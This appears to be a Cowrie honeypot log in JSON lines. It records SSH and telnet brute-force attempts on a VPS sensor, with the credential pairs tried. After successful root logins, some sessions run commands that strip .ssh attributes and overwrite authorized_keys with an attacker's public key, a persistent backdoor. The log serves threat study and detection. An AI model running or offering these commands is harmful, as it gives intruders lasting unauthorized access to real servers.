{"eventid":"cowrie.session.closed","duration":13.762185096740723,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:36:49.943310Z","src_ip":"212.227.235.229","session":"3176282ac53e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34414,"dst_ip":"1.2.3.4","dst_port":23,"session":"dcad4c6aaca1","protocol":"telnet","message":"New connection: 212.227.235.229:34414 (1.2.3.4:23) [session: dcad4c6aaca1]","sensor":"my-vps","timestamp":"2025-09-09T02:36:50.222403Z"}
{"eventid":"cowrie.login.failed","username":"mos","password":"12345678","message":"login attempt [mos/12345678] failed","sensor":"my-vps","timestamp":"2025-09-09T02:36:50.317833Z","src_ip":"212.227.235.229","session":"d2ac386a7f00"}
{"eventid":"cowrie.session.closed","duration":13.883976221084595,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:36:50.922281Z","src_ip":"212.227.235.229","session":"1aa5af4af274"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34419,"dst_ip":"1.2.3.4","dst_port":23,"session":"54aac192fc30","protocol":"telnet","message":"New connection: 212.227.235.229:34419 (1.2.3.4:23) [session: 54aac192fc30]","sensor":"my-vps","timestamp":"2025-09-09T02:36:51.185964Z"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:36:51.570191Z","src_ip":"212.227.235.229","session":"d2ac386a7f00"}
{"eventid":"cowrie.session.closed","duration":14.046538591384888,"message":"Connection lost after 14 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:36:52.246690Z","src_ip":"212.227.235.229","session":"238d9a8bc2ac"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34492,"dst_ip":"1.2.3.4","dst_port":23,"session":"333c9d939aca","protocol":"telnet","message":"New connection: 212.227.235.229:34492 (1.2.3.4:23) [session: 333c9d939aca]","sensor":"my-vps","timestamp":"2025-09-09T02:36:52.576396Z"}
{"eventid":"cowrie.session.closed","duration":14.045953273773193,"message":"Connection lost after 14 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:36:55.071264Z","src_ip":"212.227.235.229","session":"06c9977a3561"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34572,"dst_ip":"1.2.3.4","dst_port":23,"session":"d7cc2864aa77","protocol":"telnet","message":"New connection: 212.227.235.229:34572 (1.2.3.4:23) [session: d7cc2864aa77]","sensor":"my-vps","timestamp":"2025-09-09T02:36:55.301985Z"}
{"eventid":"cowrie.session.closed","duration":13.992729663848877,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:36:59.192407Z","src_ip":"212.227.235.229","session":"894b4c926dd2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34594,"dst_ip":"1.2.3.4","dst_port":23,"session":"683b375694fa","protocol":"telnet","message":"New connection: 212.227.235.229:34594 (1.2.3.4:23) [session: 683b375694fa]","sensor":"my-vps","timestamp":"2025-09-09T02:36:59.524746Z"}
{"eventid":"cowrie.session.connect","src_ip":"185.152.45.241","src_port":11778,"dst_ip":"1.2.3.4","dst_port":22,"session":"9c8e5a84a7b4","protocol":"ssh","message":"New connection: 185.152.45.241:11778 (1.2.3.4:22) [session: 9c8e5a84a7b4]","sensor":"my-vps","timestamp":"2025-09-09T02:37:01.913449Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:37:01.919346Z","src_ip":"185.152.45.241","session":"9c8e5a84a7b4"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:37:01.983510Z","src_ip":"185.152.45.241","session":"9c8e5a84a7b4"}
{"eventid":"cowrie.login.success","username":"root","password":"!qaz2wsx#edc4rfv","message":"login attempt [root/!qaz2wsx#edc4rfv] succeeded","sensor":"my-vps","timestamp":"2025-09-09T02:37:02.200616Z","src_ip":"185.152.45.241","session":"9c8e5a84a7b4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T02:37:02.367920Z","src_ip":"185.152.45.241","session":"9c8e5a84a7b4"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T02:37:02.368587Z","src_ip":"185.152.45.241","session":"9c8e5a84a7b4"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T02:37:02.369502Z","src_ip":"185.152.45.241","session":"9c8e5a84a7b4"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:37:02.419737Z","src_ip":"185.152.45.241","session":"9c8e5a84a7b4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T02:37:02.578342Z","src_ip":"185.152.45.241","session":"9c8e5a84a7b4"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T02:37:02.579232Z","src_ip":"185.152.45.241","session":"9c8e5a84a7b4"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T02:37:02.629578Z","src_ip":"185.152.45.241","session":"9c8e5a84a7b4"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:37:02.630609Z","src_ip":"185.152.45.241","session":"9c8e5a84a7b4"}
{"eventid":"cowrie.session.connect","src_ip":"185.152.45.241","src_port":11784,"dst_ip":"1.2.3.4","dst_port":22,"session":"9c2db0bb9131","protocol":"ssh","message":"New connection: 185.152.45.241:11784 (1.2.3.4:22) [session: 9c2db0bb9131]","sensor":"my-vps","timestamp":"2025-09-09T02:37:02.674739Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:37:02.675665Z","src_ip":"185.152.45.241","session":"9c2db0bb9131"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:37:02.723264Z","src_ip":"185.152.45.241","session":"9c2db0bb9131"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T02:37:02.964317Z","src_ip":"185.152.45.241","session":"9c2db0bb9131"}
{"eventid":"cowrie.session.closed","duration":13.547074556350708,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:37:03.096026Z","src_ip":"212.227.235.229","session":"e8547273b02a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34738,"dst_ip":"1.2.3.4","dst_port":23,"session":"ee512513cd10","protocol":"telnet","message":"New connection: 212.227.235.229:34738 (1.2.3.4:23) [session: ee512513cd10]","sensor":"my-vps","timestamp":"2025-09-09T02:37:03.329338Z"}
{"eventid":"cowrie.session.closed","duration":13.429110765457153,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:37:03.651447Z","src_ip":"212.227.235.229","session":"dcad4c6aaca1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34744,"dst_ip":"1.2.3.4","dst_port":23,"session":"fd7bfaa3047b","protocol":"telnet","message":"New connection: 212.227.235.229:34744 (1.2.3.4:23) [session: fd7bfaa3047b]","sensor":"my-vps","timestamp":"2025-09-09T02:37:03.876767Z"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:37:04.013828Z","src_ip":"185.152.45.241","session":"9c2db0bb9131"}
{"eventid":"cowrie.session.connect","src_ip":"185.152.45.241","src_port":11785,"dst_ip":"1.2.3.4","dst_port":22,"session":"7f9d428b63b1","protocol":"ssh","message":"New connection: 185.152.45.241:11785 (1.2.3.4:22) [session: 7f9d428b63b1]","sensor":"my-vps","timestamp":"2025-09-09T02:37:04.064105Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:37:04.064793Z","src_ip":"185.152.45.241","session":"7f9d428b63b1"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:37:04.113815Z","src_ip":"185.152.45.241","session":"7f9d428b63b1"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T02:37:04.374264Z","src_ip":"185.152.45.241","session":"7f9d428b63b1"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:37:04.424097Z","src_ip":"185.152.45.241","session":"9c8e5a84a7b4"}
{"eventid":"cowrie.session.closed","duration":"0.4","message":"Connection lost after 0.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:37:04.425176Z","src_ip":"185.152.45.241","session":"7f9d428b63b1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57762,"dst_ip":"1.2.3.4","dst_port":22,"session":"4806764bee28","protocol":"ssh","message":"New connection: 212.227.235.229:57762 (1.2.3.4:22) [session: 4806764bee28]","sensor":"my-vps","timestamp":"2025-09-09T02:37:04.792570Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:37:04.794806Z","src_ip":"212.227.235.229","session":"4806764bee28"}
{"eventid":"cowrie.session.closed","duration":13.833021640777588,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:37:05.018919Z","src_ip":"212.227.235.229","session":"54aac192fc30"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:37:05.099852Z","src_ip":"212.227.235.229","session":"4806764bee28"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34748,"dst_ip":"1.2.3.4","dst_port":23,"session":"53711809cc18","protocol":"telnet","message":"New connection: 212.227.235.229:34748 (1.2.3.4:23) [session: 53711809cc18]","sensor":"my-vps","timestamp":"2025-09-09T02:37:05.281904Z"}
{"eventid":"cowrie.session.closed","duration":13.148451089859009,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:37:05.724761Z","src_ip":"212.227.235.229","session":"333c9d939aca"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34754,"dst_ip":"1.2.3.4","dst_port":23,"session":"fdc46c6361d7","protocol":"telnet","message":"New connection: 212.227.235.229:34754 (1.2.3.4:23) [session: fdc46c6361d7]","sensor":"my-vps","timestamp":"2025-09-09T02:37:05.960134Z"}
{"eventid":"cowrie.login.success","username":"root","password":"Ll123456789","message":"login attempt [root/Ll123456789] succeeded","sensor":"my-vps","timestamp":"2025-09-09T02:37:06.323411Z","src_ip":"212.227.235.229","session":"4806764bee28"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T02:37:06.959017Z","src_ip":"212.227.235.229","session":"4806764bee28"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T02:37:06.959702Z","src_ip":"212.227.235.229","session":"4806764bee28"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T02:37:06.960614Z","src_ip":"212.227.235.229","session":"4806764bee28"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:37:07.268288Z","src_ip":"212.227.235.229","session":"4806764bee28"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T02:37:07.980534Z","src_ip":"212.227.235.229","session":"4806764bee28"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T02:37:07.981192Z","src_ip":"212.227.235.229","session":"4806764bee28"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T02:37:08.289839Z","src_ip":"212.227.235.229","session":"4806764bee28"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:37:08.290764Z","src_ip":"212.227.235.229","session":"4806764bee28"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59250,"dst_ip":"1.2.3.4","dst_port":22,"session":"a7e9cb4900dc","protocol":"ssh","message":"New connection: 212.227.235.229:59250 (1.2.3.4:22) [session: a7e9cb4900dc]","sensor":"my-vps","timestamp":"2025-09-09T02:37:08.502753Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:37:08.503686Z","src_ip":"212.227.235.229","session":"a7e9cb4900dc"}
{"eventid":"cowrie.session.closed","duration":13.452850818634033,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:37:08.754039Z","src_ip":"212.227.235.229","session":"d7cc2864aa77"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:37:08.758163Z","src_ip":"212.227.235.229","session":"a7e9cb4900dc"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34777,"dst_ip":"1.2.3.4","dst_port":23,"session":"0757cd121303","protocol":"telnet","message":"New connection: 212.227.235.229:34777 (1.2.3.4:23) [session: 0757cd121303]","sensor":"my-vps","timestamp":"2025-09-09T02:37:09.043634Z"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T02:37:09.812195Z","src_ip":"212.227.235.229","session":"a7e9cb4900dc"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":40442,"dst_ip":"1.2.3.4","dst_port":22,"session":"38afbe4230ee","protocol":"ssh","message":"New connection: 212.227.125.160:40442 (1.2.3.4:22) [session: 38afbe4230ee]","sensor":"my-vps","timestamp":"2025-09-09T02:37:10.149245Z"}
